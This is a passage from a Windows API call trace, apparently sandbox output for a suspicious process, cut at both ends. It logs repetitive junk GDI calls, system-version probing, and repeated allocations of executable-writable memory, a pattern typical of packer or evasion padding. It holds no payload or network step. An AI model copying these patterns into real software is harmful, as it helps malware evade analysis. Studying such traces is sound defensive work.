dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.875] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.875] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.875] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.875] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.875] BeginPath (hdc=0x0) returned 0 [0017.875] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.875] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.875] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.875] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.875] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.875] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.875] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.875] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.875] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x8304027d [0017.875] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x8d040713 [0017.875] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e5f [0017.875] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e60 [0017.875] CombineRgn (hrgnDst=0x1040e5f, hrgnSrc1=0x8304027d, hrgnSrc2=0x8d040713, iMode=1) returned 1 [0017.875] CombineRgn (hrgnDst=0x1040e60, hrgnSrc1=0x8304027d, hrgnSrc2=0x8d040713, iMode=4) returned 2 [0017.875] CreateSolidBrush (color=0xff) returned 0x2100e5e [0017.875] CreateSolidBrush (color=0xff0000) returned 0x1100e61 [0017.875] DeleteObject (ho=0x1100e61) returned 1 [0017.875] DeleteObject (ho=0x8d040713) returned 1 [0017.875] DeleteObject (ho=0x8304027d) returned 1 [0017.875] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.875] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.876] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.876] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.876] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.876] BeginPath (hdc=0x0) returned 0 [0017.876] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.876] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.876] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.876] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.876] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.876] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.876] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.876] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.876] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x8e040713 [0017.876] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x8404027d [0017.876] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e62 [0017.876] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e63 [0017.876] CombineRgn (hrgnDst=0x1040e62, hrgnSrc1=0x8e040713, hrgnSrc2=0x8404027d, iMode=1) returned 1 [0017.876] CombineRgn (hrgnDst=0x1040e63, hrgnSrc1=0x8e040713, hrgnSrc2=0x8404027d, iMode=4) returned 2 [0017.876] CreateSolidBrush (color=0xff) returned 0x2100e61 [0017.876] CreateSolidBrush (color=0xff0000) returned 0x1100e64 [0017.876] DeleteObject (ho=0x1100e64) returned 1 [0017.876] DeleteObject (ho=0x8404027d) returned 1 [0017.876] DeleteObject (ho=0x8e040713) returned 1 [0017.876] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.876] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.876] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.876] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.876] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.877] BeginPath (hdc=0x0) returned 0 [0017.877] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.877] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.877] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.877] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.877] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.877] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.877] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.877] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.877] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x8504027d [0017.877] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x8f040713 [0017.877] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e65 [0017.877] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e66 [0017.877] CombineRgn (hrgnDst=0x1040e65, hrgnSrc1=0x8504027d, hrgnSrc2=0x8f040713, iMode=1) returned 1 [0017.877] CombineRgn (hrgnDst=0x1040e66, hrgnSrc1=0x8504027d, hrgnSrc2=0x8f040713, iMode=4) returned 2 [0017.877] CreateSolidBrush (color=0xff) returned 0x2100e64 [0017.877] CreateSolidBrush (color=0xff0000) returned 0x1100e67 [0017.877] DeleteObject (ho=0x1100e67) returned 1 [0017.877] DeleteObject (ho=0x8f040713) returned 1 [0017.877] DeleteObject (ho=0x8504027d) returned 1 [0017.877] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.877] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.877] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.877] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.877] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.877] BeginPath (hdc=0x0) returned 0 [0017.877] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.877] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.877] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.877] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.878] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.878] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.878] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.878] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.878] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x90040713 [0017.878] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x8604027d [0017.878] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e68 [0017.878] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e69 [0017.878] CombineRgn (hrgnDst=0x1040e68, hrgnSrc1=0x90040713, hrgnSrc2=0x8604027d, iMode=1) returned 1 [0017.878] CombineRgn (hrgnDst=0x1040e69, hrgnSrc1=0x90040713, hrgnSrc2=0x8604027d, iMode=4) returned 2 [0017.878] CreateSolidBrush (color=0xff) returned 0x2100e67 [0017.878] CreateSolidBrush (color=0xff0000) returned 0x1100e6a [0017.878] DeleteObject (ho=0x1100e6a) returned 1 [0017.878] DeleteObject (ho=0x8604027d) returned 1 [0017.878] DeleteObject (ho=0x90040713) returned 1 [0017.878] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.878] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.878] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.878] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.878] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.878] BeginPath (hdc=0x0) returned 0 [0017.878] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.878] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.878] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.878] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.878] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.878] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.878] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.879] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.879] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x8704027d [0017.879] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x91040713 [0017.879] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e6b [0017.879] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e6c [0017.879] CombineRgn (hrgnDst=0x1040e6b, hrgnSrc1=0x8704027d, hrgnSrc2=0x91040713, iMode=1) returned 1 [0017.879] CombineRgn (hrgnDst=0x1040e6c, hrgnSrc1=0x8704027d, hrgnSrc2=0x91040713, iMode=4) returned 2 [0017.879] CreateSolidBrush (color=0xff) returned 0x2100e6a [0017.879] CreateSolidBrush (color=0xff0000) returned 0x1100e6d [0017.879] DeleteObject (ho=0x1100e6d) returned 1 [0017.879] DeleteObject (ho=0x91040713) returned 1 [0017.879] DeleteObject (ho=0x8704027d) returned 1 [0017.879] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.879] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.879] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.879] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.879] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.879] BeginPath (hdc=0x0) returned 0 [0017.879] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.879] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.879] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.879] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.879] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.879] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0018.549] SendMessageA (hWnd=0x401c0, Msg=0xc, wParam=0x0, lParam=0x1885d4) returned 0x1 [0018.549] SendMessageA (hWnd=0x401c0, Msg=0xd, wParam=0x3e8, lParam=0x1885d4) returned 0x9 [0018.549] GetLastError () returned 0x578 [0018.550] lstrlenA (lpString="-") returned 1 [0018.550] GetTextExtentPointA (in: hdc=0x0, lpString="-", c=1, lpsz=0x18f4bc | out: lpsz=0x18f4bc) returned 0 [0018.550] GetStockObject (i=13) returned 0x18a002e [0018.550] GetObjectA (in: h=0x18a002e, c=60, pv=0x18edf0 | out: pv=0x18edf0) returned 60 [0018.550] CreateFontIndirectA (lplf=0x18edf0) returned 0x0 [0018.550] SelectObject (hdc=0x0, h=0x8edbcff3) returned 0x0 [0018.550] lstrlenA (lpString="99/99") returned 5 [0018.550] GetTextExtentPointA (in: hdc=0x0, lpString="99/99", c=5, lpsz=0x18f4bc | out: lpsz=0x18f4bc) returned 0 [0018.550] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0018.550] ReleaseDC (hWnd=0x0, hDC=0x0) returned 0 [0018.555] EnumTimeFormatsA (lpTimeFmtEnumProc=0x25e0590, Locale=0x400, dwFlags=0x0) [0018.623] GetModuleHandleA (lpModuleName="ntdll") returned 0x776a0000 [0018.625] GetModuleHandleA (lpModuleName="advapi32") returned 0x77200000 [0018.635] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x3d40000 [0018.648] VirtualFree (lpAddress=0x3d40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0018.650] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x3d40000 [0018.663] VirtualFree (lpAddress=0x3d40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0018.665] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x3d40000 [0018.678] VirtualFree (lpAddress=0x3d40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0018.681] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x3d40000 [0018.701] VirtualFree (lpAddress=0x3d40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0018.703] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x3d40000 [0018.734] VirtualFree (lpAddress=0x3d40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0018.736] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x3d40000 [0018.749] VirtualFree (lpAddress=0x3d40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0018.751] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x3d40000 [0018.766] VirtualFree (lpAddress=0x3d40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0018.768] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x3d40000 [0018.779] VirtualFree (lpAddress=0x3d40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0018.782] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x3d40000 [0018.814] VirtualFree (lpAddress=0x3d40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0018.816] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x3d40000 [0018.834] VirtualFree (lpAddress=0x3d40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0018.837] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x3d40000 [0018.849] VirtualFree (lpAddress=0x3d40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0018.851] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x3d40000 [0018.864] VirtualFree (lpAddress=0x3d40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0018.866] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x3d40000 [0018.894] VirtualFree (lpAddress=0x3d40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0018.897] GetModuleHandleA (lpModuleName="ntdll") returned 0x776a0000 [0018.898] GetModuleHandleA (lpModuleName="advapi32") returned 0x77200000 [0018.910] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0018.914] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x3d40000 [0018.924] VirtualFree (lpAddress=0x3d40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0018.925] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x3d40000 [0018.936] VirtualFree (lpAddress=0x3d40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0018.939] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x3d40000 [0018.952] VirtualFree (lpAddress=0x3d40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0018.954] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x3d40000 [0018.967] VirtualFree (lpAddress=0x3d40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0018.972] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x3d40000 [0018.986] VirtualFree (lpAddress=0x3d40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0018.988] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x3d40000 [0019.000] VirtualFree (lpAddress=0x3d40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0019.002] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x3d40000 [0019.469] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.469] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.470] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.470] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.470] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.470] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.470] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.470] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.471] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.471] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.471] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.471] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.471] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.471] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.471] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.471] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.471] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.471] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.471] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.471] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.472] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.472] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.472] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.472] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.472] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.472] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.472] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.472] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.472] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.473] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.473] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.473] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.473] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.473] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.473] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.473] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.473] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.473] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.473] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.473] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.473] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.474] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.474] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.474] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.474] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.474] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.474] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.474] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.474] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.474] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.474] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.474] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.474] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.475] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.475] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.475] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.475] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.475] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.475] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.475] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.475] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.475] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.476] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 